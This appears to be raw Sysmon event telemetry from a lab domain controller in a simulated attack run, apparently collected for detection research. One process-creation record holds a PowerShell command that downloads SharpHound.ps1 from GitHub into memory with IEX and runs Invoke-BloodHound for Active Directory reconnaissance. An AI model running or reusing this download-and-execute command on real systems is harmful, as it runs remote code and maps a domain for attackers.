16:56:18.029{05ADC7E1-6CB1-603E-34AA-00000000AD01}1169612080C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-6E32-603E-F9AA-00000000AD01}14192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+fffcffed(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+fffcffed(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+fffcffed(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+fffcffed(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b3743(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b35b7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f535de3(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4ac19f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6ff65392(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f474997(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4d2e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b635c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4a82e1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4e1471(wow64) 154100x80000000000000002243976Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:18.038{05ADC7E1-6E32-603E-F9AA-00000000AD01}14192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {write-host \""Remote download of SharpHound.ps1 into memory, followed by execution of the script\"" -ForegroundColor Cyan IEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1'); Invoke-BloodHound -OutputDirectory $env:Temp Start-Sleep 5} C:\Users\ADMINI~1\AppData\Local\Temp\2\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x80000000000000002243975Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:18.029{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-err.txt2021-03-02 16:56:11.776 11241100x80000000000000002243974Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:18.029{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-out.txt2021-03-02 16:56:11.773 23542300x80000000000000002243997Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:19.592{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7E71916D57F85C05F5E6D9B897E325EB,SHA256=5D31686D4BA14AE7989F1B6765C872F565D8A52FF1828DC3969DC3B4DA357916,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002244004Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:09.479{05ADC7E1-6E32-603E-F9AA-00000000AD01}14192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-974.attackrange.local60182-false185.199.109.133cdn-185-199-109-133.github.com443https 10341000x80000000000000002244003Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:20.904{05ADC7E1-22AF-6039-2800-00000000AD01}19363196C:\Windows\sysmon64.exe{05ADC7E1-6E32-603E-F9AA-00000000AD01}14192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ntdll.dll+6cdaa|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Windows\sysmon64.exe+14ced|C:\Windows\sysmon64.exe+15adb|C:\Windows\sysmon64.exe+16c29|C:\Windows\sysmon64.exe+1abb1|C:\Windows\sysmon64.exe+1cfc7|C:\Windows\sysmon64.exe+1d392|C:\Windows\sysmon64.exe+1d4a5|C:\Windows\sysmon64.exe+b0519|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244002Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:20.904{05ADC7E1-22AF-6039-2800-00000000AD01}19363196C:\Windows\sysmon64.exe{05ADC7E1-6E32-603E-F9AA-00000000AD01}14192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\sysmon64.exe+2682c|C:\Windows\sysmon64.exe+1cc6d|C:\Windows\sysmon64.exe+1d392|C:\Windows\sysmon64.exe+1d4a5|C:\Windows\sysmon64.exe+b0519|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002244001Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:20.623{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6CA37CA2855402F93C9866C8EB42A3E9,SHA256=CC2603E608856C4F96C79C23339CC195BABE53E574B31C5E13547231484EDFFE,IMPHASH=00000000000000000000000000000000falsetrue 22542200x80000000000000002244000Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:09.478{05ADC7E1-6E32-603E-F9AA-00000000AD01}14192raw.githubusercontent.com0::ffff:185.199.109.133;::ffff:185.199.110.133;::ffff:185.199.111.133;::ffff:185.199.108.133;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10341000x80000000000000002243999Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:20.342{05ADC7E1-22AF-6039-2800-00000000AD01}19363212C:\Windows\sysmon64.exe{05ADC7E1-6E32-603E-F9AA-00000000AD01}14192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ntdll.dll+6cdaa|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Windows\sysmon64.exe+14ced|C:\Windows\sysmon64.exe+15adb|C:\Windows\sysmon64.exe+16495|C:\Windows\sysmon64.exe+16778|C:\Windows\sysmon64.exe+16aae|C:\Windows\sysmon64.exe+1a5ae|C:\Windows\sysmon64.exe+5ea0|C:\Windows\sysmon64.exe+6037|C:\Windows\System32\sechost.dll+10a75|C:\Windows\System32\sechost.dll+1004d|C:\Windows\System32\sechost.dll+fe55|C:\Windows\System32\sechost.dll+ed3f|C:\Windows\sysmon64.exe+6213|C:\Windows\sysmon64.exe+b0519|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002243998Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:20.186{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A4E63CBC6FB957CC9167D58AFB993D67,SHA256=0AED527C059D57371E0390D38EE0D74E1560F8172D4410C0EA7938F36180839E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002244006Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:21.639{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=59373DCA3712C10928707B830FE9EF13,SHA256=35BD2F5B8D0282A7EAE61B0E0165CFE1A7897B001CBC3FAD720508D1C7CA880A,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002244005Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:10.300{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60183-false10.0.1.12-8000- 23542300x80000000000000002244007Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:22.654{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FA5CD64B018F2EA0B83472981FD66D33,SHA256=6D0ABFBBA015BC03B43EAA0693786CEF977C457099E3CBB070043E82590C24E7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000002244033Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:23.920{05ADC7E1-6E37-603E-FAAA-00000000AD01}4836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\Default_File_Path.ps12021-03-01 22:53:33.433 23542300x80000000000000002244032Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:23.920{05ADC7E1-6E37-603E-FAAA-00000000AD01}4836ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\Default_File_Path.ps1MD5=DCE6250005968B2E1003165602177255,SHA256=4013A9DB2598C677B34A6C4753E91216B844C567D5110931647C38680DE03BAF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002244031Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:23.826{05ADC7E1-229F-6039-1600-00000000AD01}15401672C:\Windows\system32\svchost.exe{05ADC7E1-6E37-603E-FAAA-00000000AD01}4836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244030Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:23.826{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6E37-603E-FAAA-00000000AD01}4836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244029Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:23.775{05ADC7E1-229D-6039-0B00-00000000AD01}85216356C:\Windows\system32\lsass.exe{05ADC7E1-6E37-603E-FAAA-00000000AD01}4836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244028Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:23.775{05ADC7E1-229D-6039-0B00-00000000AD01}85216356C:\Windows\system32\lsass.exe{05ADC7E1-6E37-603E-FAAA-00000000AD01}4836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000002244027Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-02 16:56:23.748{05ADC7E1-6E37-603E-FAAA-00000000AD01}4836\PSHost.132591777836524605.4836.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000002244026Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:23.733{05ADC7E1-6E37-603E-FAAA-00000000AD01}4836ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_ufd5iges.dh3.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002244025Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:23.733{05ADC7E1-6E37-603E-FAAA-00000000AD01}4836ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_hcysfaqc.ggd.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000002244024Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:23.717{05ADC7E1-6E37-603E-FAAA-00000000AD01}4836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_hcysfaqc.ggd.ps12021-03-02 16:56:23.717 23542300x80000000000000002244023Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:23.701{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9162E4F09908A6153679FEC6D40A5812,SHA256=3B85DF9F01AC215335E2BEB6B8A8D1A38E96F97A3E8A68BA02D06C61EC7E2032,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002244022Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:23.701{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-6E37-603E-FAAA-00000000AD01}4836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244021Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:23.654{05ADC7E1-6CB1-603E-35AA-00000000AD01}148289956C:\Windows\system32\conhost.exe{05ADC7E1-6E37-603E-FAAA-00000000AD01}4836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244020Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:23.654{05ADC7E1-6CB1-603E-34AA-00000000AD01}1169612080C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-6E37-603E-FAAA-00000000AD01}4836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b42a7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b452d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3ed3|UNKNOWN(00007FF829F94433) 10341000x80000000000000002244019Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:23.639{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244018Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:23.639{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244017Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:23.639{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244016Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:23.639{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244015Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:23.639{05ADC7E1-29F0-6039-C005-00000000AD01}49443952C:\Windows\system32\csrss.exe{05ADC7E1-6E37-603E-FAAA-00000000AD01}4836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002244014Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 